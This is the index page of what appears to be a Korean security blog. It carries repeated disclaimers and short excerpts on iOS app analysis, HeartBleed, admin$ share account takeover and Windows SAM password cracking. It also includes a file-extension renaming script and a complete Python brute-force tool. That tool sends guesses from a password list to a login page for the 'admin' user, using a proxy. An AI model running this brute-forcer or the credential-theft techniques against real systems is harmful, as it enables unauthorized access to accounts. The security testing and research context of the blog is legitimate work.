iOS 앱 정적 분석하기(class-dump-z, clutch)
Notice : 해당 자료가 저작권등에 의해서 문제가 있다면 바로 삭제하겠습니다. 연구목적으로 사용하지 않고 악의적인 목적으로 이용할 경우 발생할 수 있는 법적은 책임은 모두 본인에게 있습니다. iOS 앱 보안진단을 위한 환경설정 iOS 앱 정적 분석하기(class-dump-z, clutch) Objective-C Runtime의 이해와 gdb … Continue reading
Notice : 해당 자료가 저작권등에 의해서 문제가 있다면 바로 삭제하겠습니다. 연구목적으로 사용하지 않고 악의적인 목적으로 이용할 경우 발생할 수 있는 법적은 책임은 모두 본인에게 있습니다. iOS 앱 보안진단을 위한 환경설정 iOS 앱 정적 분석하기(class-dump-z, clutch) Objective-C Runtime의 이해와 gdb … Continue reading
Notice : 해당 자료가 저작권등에 의해서 문제가 있다면 바로 삭제하겠습니다. 연구목적으로 사용하지 않고 악의적인 목적으로 이용할 경우 발생할 수 있는 법적은 책임은 모두 본인에게 있습니다. iOS 앱 보안진단을 위한 환경설정 iOS 앱 정적 분석하기(class-dump-z, clutch) Objective-C Runtime의 이해와 gdb … Continue reading
Notice : 해당 자료가 저작권등에 의해서 문제가 있다면 바로 삭제하겠습니다. 연구목적으로 사용하지 않고 악의적인 목적으로 이용할 경우 발생할 수 있는 법적은 책임은 모두 본인에게 있습니다. 몇일전부터 HeartBleed OpenSSL 취약점(CVE-2014-0160)이 이슈가 되고 있어서 확인해봤다. 확인해보니 꽤 치명적이다..ㅠ 먼저 HeartBleed 취약점을 … Continue reading
Notice : 해당 자료가 저작권등에 의해서 문제가 있다면 바로 삭제하겠습니다. 연구목적으로 사용하지 않고 악의적인 목적으로 이용할 경우 발생할 수 있는 법적은 책임은 모두 본인에게 있습니다. 1. IDA PRO 설치 폴더 내 dbgsrv 디렉토리에 가보면 android_server 파일이 있다. 이 파일을 … Continue reading
Notice : 해당 자료가 저작권등에 의해서 문제가 있다면 바로 삭제하겠습니다. 연구목적으로 사용하지 않고 악의적인 목적으로 이용할 경우 발생할 수 있는 법적은 책임은 모두 본인에게 있습니다. 파일의 확장자 변경
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
# -*- coding:utf-8 -*- import os, sys, optparse def main(): parser = optparse.OptionParser('usage changeExt.py -s <source ext> -d <dest ext>') parser.add_option('-s', dest='srcext', type='string', help='source ext') parser.add_option('-d', dest='destext', type='string', help='dest ext') (options, args) = parser.parse_args() srcext = options.srcext destext = options.destext if (srcext == None) | (destext == None): print parser.usage exit(0) for base, dirs, names in os.walk("./"): for name in names: if os.path.splitext(name)[1].lower() == "."+srcext : src = os.path.join(base, name) dest = os.path.splitext(src)[0]+"."+destext #print src #print dest os.rename(src, dest) if __name__ == '__main__': main() |
사용법
1 2 3 4 5 |
$ python changeExt.py usage changeExt.py -s <source ext> -d <dest ext> # smali 확장자를 java으로 변경 $ python changeExt.py -s smali -d java |
Notice : 해당 자료가 저작권등에 의해서 문제가 있다면 바로 삭제하겠습니다. 연구목적으로 사용하지 않고 악의적인 목적으로 이용할 경우 발생할 수 있는 법적은 책임은 모두 본인에게 있습니다. admin$ 공유를 이용하면 계정을 탈취할 수 있다. 특히 누구나 접근가능한 everyone으로 열린 admin$ 공유는 … Continue reading
Notice : 해당 자료가 저작권등에 의해서 문제가 있다면 바로 삭제하겠습니다. 연구목적으로 사용하지 않고 악의적인 목적으로 이용할 경우 발생할 수 있는 법적은 책임은 모두 본인에게 있습니다. Windows password crack (SAM/SYSTEM) 1. windows에서 Shadow Copy 프로그램을 이용하여 C:\Windows\System32\config\ 에 있는 SAM와 … Continue reading
Notice : 해당 자료가 저작권등에 의해서 문제가 있다면 바로 삭제하겠습니다. 연구목적으로 사용하지 않고 악의적인 목적으로 이용할 경우 발생할 수 있는 법적은 책임은 모두 본인에게 있습니다. python brute force http, https with proxy
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 |
# -*- coding: utf-8 -*- import urllib, urllib2, optparse, time opener = urllib2.build_opener( urllib2.HTTPHandler(), urllib2.HTTPSHandler(), urllib2.ProxyHandler({'http': 'http://proxy_url:port', 'https': 'http://proxy_url:port'})) urllib2.install_opener(opener) def post_request(url, params) : param = urllib.urlencode(params) request = urllib2.Request(url, param) response = urllib2.urlopen(request) response_info = response.info() response_html = response.read() response.close() if response_html.find('用'.decode('gb2312').encode('utf-8'), 0, 100) : print(" .") else : print("found password!!") def get_request(url) : response = urllib2.urlopen(url) response_info = response.info() response_html = response.read() response.close() def main(): parser = optparse.OptionParser('usage bf.py -f passwordfile') parser.add_option('-f', dest='filename', type='string', help='input file') (options, args) = parser.parse_args() filename = options.filename if filename == None : print parser.usage exit(0) f = file(filename, 'r') while True: line = f.readline() if not line : # file end break else : print ("passwd : " + line.rstrip('\n')) post_url = "https://target.domain/path/login.action" post_params = { 'paraam1':'test', 'UserId':'admin', 'UserPass':line.rstrip('\n') } post_request(post_url, post_params) time.sleep(1) if __name__ == '__main__': main() |
Notice : 해당 자료가 저작권등에 의해서 문제가 있다면 바로 삭제하겠습니다. 연구목적으로 사용하지 않고 악의적인 목적으로 이용할 경우 발생할 수 있는 법적은 책임은 모두 본인에게 있습니다. [구매하기] 실전 악성코드와 멀웨어 분석 – 1장 기초 정적분석 실습 1-1 실전 악성코드와 멀웨어 … Continue reading
Notice : 해당 자료가 저작권등에 의해서 문제가 있다면 바로 삭제하겠습니다. 연구목적으로 사용하지 않고 악의적인 목적으로 이용할 경우 발생할 수 있는 법적은 책임은 모두 본인에게 있습니다. [구매하기] 실전 악성코드와 멀웨어 분석 – 1장 기초 정적분석 실습 1-1 실전 악성코드와 멀웨어 … Continue reading